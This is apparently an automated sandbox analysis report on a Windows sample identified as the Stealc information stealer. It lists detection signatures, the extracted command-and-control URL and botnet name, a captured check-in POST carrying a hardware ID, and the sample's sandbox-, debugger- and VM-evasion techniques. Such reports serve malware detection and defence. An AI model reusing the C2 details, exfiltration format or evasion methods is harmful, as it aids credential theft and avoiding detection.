Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528463
MD5:c6761f44bbab998af58149acb8f7a920
SHA1:b37887456c6ebb6619f8c120bc6d7fd31f80ad27
SHA256:b1ac855c1055c03377a9b3b00f2d967f0bd6f6066a9215df60e951bd45741c8f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C6761F44BBAB998AF58149ACB8F7A920)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2324JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2324JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ba0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T23:23:07.566582+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.ba0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BAC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BA9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BA7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BA9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00BB8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BABE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="hwid"EE3F0570167F2148772887------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="build"doma------IDBAFHDGDGHDGCBFCFID--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BA4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 33 46 30 35 37 30 31 36 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="hwid"EE3F0570167F2148772887------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="build"doma------IDBAFHDGDGHDGCBFCFID--
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/?
                Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
                Source: file.exe, 00000000.00000002.2194021053.0000000001459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
                Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.2194021053.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl
                Source: file.exe, 00000000.00000002.2194021053.0000000001465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
                Source: file.exe, 00000000.00000002.2194021053.000000000144D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37W

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F20_2_00F828F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F788C10_2_00F788C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101099F0_2_0101099F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4104B0_2_00E4104B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8126E0_2_00F8126E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7123A0_2_00F7123A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7F21C0_2_00F7F21C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F753C40_2_00F753C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7A3120_2_00F7A312
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6F46A0_2_00E6F46A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF54100_2_00EF5410
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E21D600_2_00E21D60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F76D700_2_00F76D70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010334AB0_2_010334AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7BD3F0_2_00F7BD3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F71E830_2_00F71E83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBA62E0_2_00EBA62E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E82FE90_2_00E82FE9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7D7A10_2_00F7D7A1
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BA45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nwkcdrfe ZLIB complexity 0.9947724143783947
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.2152337269.0000000005100000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00BB8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00BB3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\33E6X32C.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2194021053.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1853440 > 1048576
                Source: file.exeStatic PE information: Raw size of nwkcdrfe is bigger than: 0x100000 < 0x19e400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nwkcdrfe:EW;wlorzjea:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nwkcdrfe:EW;wlorzjea:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cdf45 should be: 0x1c81df
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nwkcdrfe
                Source: file.exeStatic PE information: section name: wlorzjea
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebp; mov dword ptr [esp], ecx0_2_00F828FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 4CBBF4B0h; mov dword ptr [esp], ecx0_2_00F8290E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 790CB9B4h; mov dword ptr [esp], ebx0_2_00F8297F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 49A4D848h0_2_00F829FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebp; mov dword ptr [esp], edx0_2_00F82A38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebp; mov dword ptr [esp], edi0_2_00F82AB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push esi; mov dword ptr [esp], edx0_2_00F82AC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ecx; mov dword ptr [esp], edi0_2_00F82AD8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebp; mov dword ptr [esp], 7DFEAC2Dh0_2_00F82AE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 0F061733h; mov dword ptr [esp], eax0_2_00F82B9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 7BFB4E00h0_2_00F82BA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 33600D4Fh; mov dword ptr [esp], ebx0_2_00F82C3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 0F6AA278h; mov dword ptr [esp], ecx0_2_00F82C43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 074A0F9Ah; mov dword ptr [esp], ebx0_2_00F82CE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push eax; mov dword ptr [esp], ebx0_2_00F82DF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 2845F994h; mov dword ptr [esp], ebp0_2_00F82E4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push eax; mov dword ptr [esp], edx0_2_00F82E69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 50A7F780h; mov dword ptr [esp], ecx0_2_00F82E76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 3B6C4443h; mov dword ptr [esp], ebp0_2_00F82E7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 6D999692h; mov dword ptr [esp], eax0_2_00F82EF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ecx; mov dword ptr [esp], 025019B6h0_2_00F82F09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebx; mov dword ptr [esp], 73EF6C2Bh0_2_00F82F19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push esi; mov dword ptr [esp], 00000063h0_2_00F82FA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 45796C37h; mov dword ptr [esp], edi0_2_00F83022
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebx; mov dword ptr [esp], esp0_2_00F8303B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push eax; mov dword ptr [esp], ecx0_2_00F8306C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push ebp; mov dword ptr [esp], 4BD10ABCh0_2_00F830DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 4EA060AAh; mov dword ptr [esp], eax0_2_00F830F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 4EC05736h; mov dword ptr [esp], ecx0_2_00F83121
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 5A96A954h; mov dword ptr [esp], eax0_2_00F8312C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F828F2 push 75569B6Ch; mov dword ptr [esp], eax0_2_00F8317B
                Source: file.exeStatic PE information: section name: nwkcdrfe entropy: 7.953317466464678

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13653
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F877CE second address: F877D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F866C4 second address: F866E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF449h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F869AA second address: F869B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86C8E second address: F86C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86C93 second address: F86C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86E3D second address: F86E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
